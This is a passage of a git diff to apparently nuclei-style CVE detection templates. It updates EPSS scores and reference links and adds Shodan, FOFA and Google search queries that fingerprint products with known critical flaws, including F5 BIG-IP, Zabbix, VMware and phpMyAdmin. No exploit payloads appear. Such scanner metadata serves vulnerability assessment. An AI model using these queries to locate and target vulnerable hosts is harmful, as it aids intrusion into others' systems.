cwe-id: CWE-434,CWE-862 + epss-score: 0.96342 + epss-percentile: 0.9955 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index e4dc9c8029..c92833a58d 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1386 cwe-id: CWE-918 - epss-score: 0.32824 - epss-percentile: 0.96921 + epss-score: 0.26067 + epss-percentile: 0.96717 cpe: cpe:2.3:a:fusion_builder_project:fusion_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index 6557561b7e..6921142fea 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -30,6 +30,8 @@ info: vendor: f5 product: big-ip_access_policy_manager shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2022,f5,bigip,rce,mirai,kev variables: auth: "admin:" diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 59c36a4eb5..7a633ba8a2 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1391 cwe-id: CWE-22 epss-score: 0.03037 - epss-percentile: 0.9075 + epss-percentile: 0.90957 cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 81f38e8525..aa3e492f0a 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - https://packetstormsecurity.com/files/166534/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 cwe-id: CWE-22 - epss-score: 0.01867 - epss-percentile: 0.87073 + epss-score: 0.01514 + epss-percentile: 0.86976 cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 132e36833a..78ba7bb25a 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2022-1439 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 5aad6a98d0..787366549a 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1442 cwe-id: CWE-862 - epss-score: 0.04338 - epss-percentile: 0.91514 + epss-score: 0.04148 + epss-percentile: 0.92177 cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index 6aa5f12bc3..9df7a7a7ab 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1574 cwe-id: CWE-352 - epss-score: 0.03019 - epss-percentile: 0.90712 + epss-score: 0.05961 + epss-percentile: 0.93455 cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index bb9095f37a..82a6da85c0 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.3 cve-id: CVE-2022-1580 cwe-id: CWE-639 - epss-score: 0.00058 - epss-percentile: 0.24444 + epss-score: 0.00069 + epss-percentile: 0.29862 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,6 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 484e845f2c..e6049f2e36 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1597 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.55258 + epss-percentile: 0.56053 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index a01f8dc4ee..53c881e95d 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1598 cwe-id: CWE-306 epss-score: 0.01171 - epss-percentile: 0.84672 + epss-percentile: 0.84938 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 047d066d04..eb724b8755 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1713 cwe-id: CWE-918 - epss-score: 0.0258 - epss-percentile: 0.90003 + epss-score: 0.02483 + epss-percentile: 0.90072 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: diagrams product: drawio shodan-query: http.title:"Flowchart Maker" + fofa-query: title="flowchart maker" + google-query: intitle:"flowchart maker" tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams http: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index ef39f7d039..144692e404 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -29,6 +29,8 @@ info: product: newsletter framework: wordpress publicwww-query: "/wp-content/plugins/newsletter/" + shodan-query: http.html:/wp-content/plugins/newsletter/ + fofa-query: body=/wp-content/plugins/newsletter/ tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress http: diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index 94f02f86c3..8a1ebf7e0f 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1768 cwe-id: CWE-89 - epss-score: 0.13776 - epss-percentile: 0.95151 + epss-score: 0.10537 + epss-percentile: 0.95006 cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index 4a3bd44221..3c938a5fbe 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -29,6 +29,9 @@ info: max-request: 1 vendor: diagrams product: drawio + shodan-query: http.title:"flowchart maker" + fofa-query: title="flowchart maker" + google-query: intitle:"flowchart maker" tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams http: diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index 2e5f352f06..c1cad3ec05 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 - epss-score: 0.62377 - epss-percentile: 0.97556 + epss-score: 0.70044 + epss-percentile: 0.98014 cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index d258094795..44b752cc6c 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1937 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35299 + epss-percentile: 0.36517 cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 93582af860..11f97c7aca 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/0903920c-be2e-4515-901f-87253eb30940 - https://wordpress.org/plugins/gallery-album - https://nvd.nist.gov/vuln/detail/CVE-2022-1946 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1946 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40609 + epss-score: 0.00086 + epss-percentile: 0.36517 cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 923972b6fa..61bd27c2a9 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2034 cwe-id: CWE-639 epss-score: 0.00506 - epss-percentile: 0.76026 + epss-percentile: 0.76436 cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index d9160b01fe..8566b70f96 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2022,lfi,weblogic,oracle,packetstorm http: diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 578dc0e7cb..08fcffe352 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -29,6 +29,8 @@ info: vendor: oracle product: e-business_suite shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + fofa-query: title="login" "x-oracle-dms-ecid" 200 + google-query: intitle:"login" "x-oracle-dms-ecid" 200 tags: cve,cve2022,oracle,misconfig,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index c5277580ff..77b4c625aa 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -19,13 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-21587 cwe-id: CWE-306 - epss-score: 0.97315 - epss-percentile: 0.99868 + epss-score: 0.97364 + epss-percentile: 0.99901 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle product: e-business_suite + shodan-query: http.title:"login" "x-oracle-dms-ecid" 200 + fofa-query: title="login" "x-oracle-dms-ecid" 200 + google-query: intitle:"login" "x-oracle-dms-ecid" 200 tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm http: diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 12a501de58..72d982256a 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -20,14 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21661 cwe-id: CWE-89 - epss-score: 0.93536 - epss-percentile: 0.99044 + epss-score: 0.94585 + epss-percentile: 0.99231 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wordpress product: wordpress + shodan-query: cpe:"cpe:2.3:a:wordpress:wordpress" tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress http: diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index b697414512..d21c7dc34d 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-21705 cwe-id: CWE-74,NVD-CWE-Other epss-score: 0.00522 - epss-percentile: 0.76405 + epss-percentile: 0.76813 cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 5076610bcf..13b527cbca 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -26,6 +26,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,microweber,xss,unauth http: diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index bb52187b77..64c38541bb 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -28,6 +28,8 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2022,gitlab http: diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index d09c6195c5..09e691be79 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2187 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46372 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index e8d92c1859..9de47d4adc 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2219 cwe-id: CWE-79 epss-score: 0.00159 - epss-percentile: 0.51461 + epss-percentile: 0.52368 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 0cf4e3db0a..f739623a46 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-22242 cwe-id: CWE-79 - epss-score: 0.41023 - epss-percentile: 0.972 + epss-score: 0.43644 + epss-percentile: 0.97362 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" + fofa-query: title="juniper web device manager" + google-query: intitle:"juniper web device manager" tags: cve2022,cve,xss,juniper,junos http: diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index 58113edda8..dd373be29c 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -20,14 +20,15 @@ info: cvss-score: 10 cve-id: CVE-2022-22536 cwe-id: CWE-444 - epss-score: 0.96507 - epss-percentile: 0.99572 + epss-score: 0.96479 + epss-percentile: 0.99584 cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sap product: content_server shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev http: diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index f1619bc1af..977cdf3239 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 - epss-score: 0.12656 - epss-percentile: 0.95328 + epss-score: 0.2493 + epss-percentile: 0.96665 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 + fofa-query: icon_hash=816588900 tags: cve2022,cve,exposure,sharingsphere,apache http: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index dff0f8b418..57d2759bcc 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -29,6 +29,8 @@ info: vendor: trilium_project product: trilium shodan-query: title:"Trilium Notes" + fofa-query: title="trilium notes" + google-query: intitle:"trilium notes" tags: cve,cve2022,xss,trilium,huntr,trilium_project http: diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index a0f0967a95..50068f89aa 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2022-22947 cwe-id: CWE-917,CWE-94 - epss-score: 0.97494 - epss-percentile: 0.99975 + epss-score: 0.97488 + epss-percentile: 0.99973 cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 02d131fa6e..1a35013e99 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -28,6 +28,7 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 + fofa-query: icon_hash=-1250474341 tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti http: diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 2ceac3d1c7..d08ce8fc8a 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -15,19 +15,21 @@ info: - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 + - https://github.com/djytmdj/Tool_Summary classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 - epss-score: 0.7146 - epss-percentile: 0.9778 + epss-score: 0.55025 + epss-percentile: 0.97657 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 vendor: vmware product: identity_manager fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + shodan-query: http.favicon.hash:-1250474341 tags: cve2022,cve,vmware,auth-bypass,oast http: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 2ca0d8a91c..629c17175b 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -29,6 +29,8 @@ info: vendor: siemens product: sinema_remote_connect_server shodan-query: title:"Logon - SINEMA Remote Connect" + fofa-query: title="logon - sinema remote connect" + google-query: intitle:"logon - sinema remote connect" tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens http: diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index 552d606dda..399deab755 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -13,13 +13,14 @@ info: - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - https://github.com/1mxml/CVE-2022-23131 + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-23131 cwe-id: CWE-290 - epss-score: 0.96952 - epss-percentile: 0.9967 + epss-score: 0.9708 + epss-percentile: 0.99771 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -27,6 +28,7 @@ info: product: zabbix shodan-query: http.favicon.hash:892542951 fofa-query: app="ZABBIX-监控系统" && body="saml" + google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev http: diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 6465ac9df7..c401309a90 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -20,13 +20,16 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23134 cwe-id: CWE-287,CWE-284 - epss-score: 0.34559 - epss-percentile: 0.9671 + epss-score: 0.6298 + epss-percentile: 0.97835 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zabbix product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: icon_hash=892542951 + google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,kev http: diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index edb89757c5..278b49ff48 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.03228 - epss-percentile: 0.90998 + epss-percentile: 0.91216 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 39814e8c68..758261c087 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-23347 cwe-id: CWE-22 - epss-score: 0.1468 - epss-percentile: 0.95635 + epss-score: 0.11382 + epss-percentile: 0.95203 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: bigantsoft product: bigant_server shodan-query: http.html:"BigAnt" + fofa-query: body="bigant" tags: cve,cve2022,bigant,lfi,bigantsoft http: diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index 9e7bd3de0f..7096f4a628 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -28,6 +28,7 @@ info: vendor: bigantsoft product: bigant_server shodan-query: http.html:"bigant" + fofa-query: body="bigant" tags: cve,cve2022,bigant,unauth,exposure,bigantsoft http: diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index f24c78cefe..36bc153572 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23544 cwe-id: CWE-918,CWE-79 - epss-score: 0.00083 - epss-percentile: 0.34435 + epss-score: 0.00094 + epss-percentile: 0.3975 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 4ae33db0af..4772bf8473 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 - epss-score: 0.04177 - epss-percentile: 0.92016 + epss-score: 0.03672 + epss-percentile: 0.91725 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index a9ace28b9a..478a084daf 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -28,6 +28,8 @@ info: vendor: zohocorp product: manageengine_desktop_central fofa-query: app="ZOHO-ManageEngine-Desktop" + shodan-query: http.title:"manageengine desktop central 10" + google-query: intitle:"manageengine desktop central 10" tags: cve,cve2022,zoho,exposure,zohocorp http: diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 4d9d63a2b9..9b5ac28319 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23808 cwe-id: CWE-79 - epss-score: 0.00743 - epss-percentile: 0.78912 + epss-score: 0.00758 + epss-percentile: 0.81074 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,9 @@ info: vendor: phpmyadmin product: phpmyadmin shodan-query: http.component:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2022,phpmyadmin,xss http: diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index 57f57cb54d..946982dcce 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -14,13 +14,15 @@ info: - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531 - https://wordpress.org/plugins/feed-them-social/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2383 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2383 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45893 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +31,6 @@ info: product: feed_them_social framework: wordpress tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index f85f68fd1d..c133c55f52 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -30,6 +30,7 @@ info: vendor: aveva product: intouch_access_anywhere shodan-query: http.html:"InTouch Access Anywhere" + fofa-query: body="intouch access anywhere" tags: cve,cve2022,lfi,packetstorm,aveva,intouch http: diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 23123219c9..0c3901d89a 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-23898 cwe-id: CWE-89 epss-score: 0.0161 - epss-percentile: 0.87161 + epss-percentile: 0.87425 cpe: 